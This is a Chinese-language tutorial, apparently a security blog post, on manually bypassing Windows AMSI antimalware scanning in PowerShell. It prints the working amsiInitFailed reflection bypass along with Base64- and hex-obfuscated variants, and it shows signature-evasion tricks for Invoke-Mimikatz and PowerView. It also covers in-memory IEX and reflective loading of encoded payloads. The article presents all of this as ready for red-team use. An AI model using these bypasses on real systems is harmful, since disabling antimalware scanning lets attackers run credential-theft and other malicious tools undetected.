手工绕过AMSI检测规则详细指南<\/h1>

0x00 AMSI简介<\/h2>
Antimalware Scan Interface (AMSI)是微软推出的一个接口，用于检测和阻止恶意程序\/脚本在内存中的加载。AMSI应用于以下Windows组件：<\/p>
用户账户控制(UAC)<\/li>
PowerShell(脚本、交互式使用和动态代码评测)<\/li>
Windows主机脚本(wscript.exe和cscript.exe)<\/li>
JavaScript和VBScript<\/li>
Office VBA宏<\/li> <\/ul>
0x01 经典AMSI绕过方法<\/h2>
Matt Graeber在2016年提出的经典绕过方法：<\/p>
[Ref]<\/span>.Assembly.GetType('System.Management.Automation.AmsiUtils'<\/span>).GetField('amsiInitFailed'<\/span>,'NonPublic,Static'<\/span>).SetValue($null,$true)
<\/span><\/span><\/code><\/pre>原理：通过给amsiInitFailed<\/code>对象赋予true<\/code>值，使AMSI初始化失败，从而避免扫描。<\/p>
0x02 为什么要手动绕过而非自动混淆<\/h2>
自动混淆工具(如Invoke-Obfuscation或ISE-Steroids)的局限性：<\/p>

开源混淆工具的特征已被安全厂商收录<\/li>
混淆后文件体积显著增大(如Invoke-Mimikatz从3MB增至8MB)<\/li>
不能保证100%绕过AMSI检测<\/li>
<\/ol>
手动绕过的优势：<\/p>

更可靠，针对性更强<\/li>
深入理解AMSI检测机制<\/li>
可针对特定环境定制绕过方案<\/li>
<\/ol>
0x03 AMSI检测机制分析<\/h2>
AMSI主要通过以下方式检测恶意内容：<\/p>

字符串匹配<\/strong>：检测特定关键字如Invoke-Mimikatz<\/code>、AmsiScanBuffer<\/code>等<\/li>
正则表达式模式<\/strong>：匹配特定代码模式<\/li>
代码结构分析<\/strong>：检测可疑的代码组合<\/li>
<\/ol>
字符串检测绕过技巧<\/h3>


字符串拼接<\/strong>：<\/p>
'Amsi'<\/span> + 'Utils'<\/span>
<\/span><\/span>'amsiInit'<\/span> + 'Failed'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

编码转换<\/strong>：<\/p>


Base64编码：<\/p>
[System.Convert]<\/span>::ToBase64String([System.Text.Encoding]<\/span>::UNICODE.GetBytes("AmsiUtils"<\/span>))
<\/span><\/span># 返回：QQBtAHMAaQBVAHQAaQBsAHMA<\/span>
<\/span><\/span>
<\/span><\/span># 运行时解码：<\/span>
<\/span><\/span>[Text.Encoding]<\/span>::Unicode.GetString([Convert]<\/span>::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA'<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

HEX编码：<\/p>
'AmsiUtils'<\/span> | Format-Hex
<\/span><\/span># 运行时解码：<\/span>
<\/span><\/span>"41 6D 73 69 55 74 69 6C 73"<\/span>.Split(" "<\/span>)|forEach<\/span>{[char]<\/span>([convert]<\/span>::toint16($_,16))}|forEach<\/span>{$result=$result+$_};$result
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

变量名替换<\/strong>：<\/p>

将$base64binary<\/code>改为$encodedbinary<\/code><\/li>
将$s<\/code>改为$a<\/code><\/li>
<\/ul>
<\/li>

大小写混合与反引号插入<\/strong>：<\/p>
InV`OKe-Mim`iKaTz
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
正则表达式模式绕过<\/h3>


修改固定部分<\/strong>：<\/p>
# 原代码：<\/span>
<\/span><\/span>Get-DomainUser @UserSearcherArguments | Where-Object { $_.samaccountname -ne<\/span> 'krbtgt'<\/span> }
<\/span><\/span>
<\/span><\/span># 修改后：<\/span>
<\/span><\/span>Get-DomainUser @UserSearcherArguments | Where-Object { $_.samaccountname -ne<\/span> 'kr'<\/span>+'bt'<\/span>+'gt'<\/span> }
<\/span><\/span><\/code><\/pre><\/li>

添加换行符<\/strong>：<\/p>
$a = New-Object IO.MemoryStream(,[Convert]<\/span>::FromBase64String("H4sI[...snip...]AA=="<\/span>));
<\/span><\/span>IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($a,[IO.Compression.CompressionMode]<\/span>::Decompress))).ReadToEnd();
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 实用绕过技术实现<\/h2>
1. Base64编码绕过实现<\/h3>
[Ref]<\/span>.Assembly.GetType('System.Management.Automation.'<\/span>+$([Text.Encoding]<\/span>::Unicode.GetString([Convert]<\/span>::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA'<\/span>)))).GetField($([Text.Encoding]<\/span>::Unicode.GetString([Convert]<\/span>::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='<\/span>))),'NonPublic,Static'<\/span>).SetValue($null,$true)
<\/span><\/span><\/code><\/pre>2. HEX编码绕过实现<\/h3>
[Ref]<\/span>.Assembly.GetType('System.Management.Automation.'<\/span>+$("41 6D 73 69 55 74 69 6C 73"<\/span>.Split(" "<\/span>)|forEach<\/span>{[char]<\/span>([convert]<\/span>::toint16($_,16))}|forEach<\/span>{$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64"<\/span>.Split(" "<\/span>)|forEach<\/span>{[char]<\/span>([convert]<\/span>::toint16($_,16))}|forEach<\/span>{$result2=$result2+$_};$result2),'NonPublic,Static'<\/span>).SetValue($null,$true)
<\/span><\/span><\/code><\/pre>0x05 脚本预处理建议<\/h2>


删除所有注释<\/strong>：注释中可能包含触发AMSI的关键字<\/p>
<\/li>

精简代码<\/strong>：移除不必要的代码段<\/p>
<\/li>

使用工具辅助检测<\/strong>：<\/p>

AMSITrigger：识别脚本中的触发点<\/li>
命令示例：
.\AMSITrigger.exe -i Powerview.ps1 -f<\/span> 3
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

批量替换变量名<\/strong>：<\/p>
find .\/ -type f -print0 | xargs -0 sed -i "s\/\$base64binary\/\$encodedbinary\/g"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x06 高级绕过技术<\/h2>


加密技术应用<\/strong>：<\/p>

使用AES或3DES加密敏感字符串<\/li>
运行时解密执行<\/li>
<\/ul>
<\/li>

动态代码生成<\/strong>：<\/p>
$code = [System.Text.Encoding]<\/span>::UTF8.GetString([System.Convert]<\/span>::FromBase64String("BASE64编码的脚本内容"<\/span>))
<\/span><\/span>Invoke-Expression $code
<\/span><\/span><\/code><\/pre><\/li>

反射加载<\/strong>：<\/p>
$assembly = [System.Reflection.Assembly]<\/span>::Load([Convert]<\/span>::FromBase64String($encodedbinary))
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x07 结论与建议<\/h2>

AMSI检测主要依赖字符串和正则模式匹配<\/li>
简单的编码\/加密和字符串操作可有效绕过大多数检测<\/li>
不同AV厂商有不同的检测规则，需针对性测试<\/li>
推荐组合使用多种技术提高绕过成功率<\/li>
保持脚本简洁，移除不必要的内容<\/li>
定期更新绕过技术，因为已知方法可能被加入检测规则<\/li>
<\/ol>
实用资源<\/h3>

amsi.fail<\/a> - 自动AMSI绕过工具<\/li>
AMSITrigger<\/a> - AMSI触发点检测工具<\/li>
Invoke-Obfuscation<\/a> - PowerShell脚本混淆框架<\/li>
<\/ol>
通过理解AMSI工作原理并掌握这些绕过技术，可以有效规避安全检测，在渗透测试和红队行动中提高成功率。<\/p>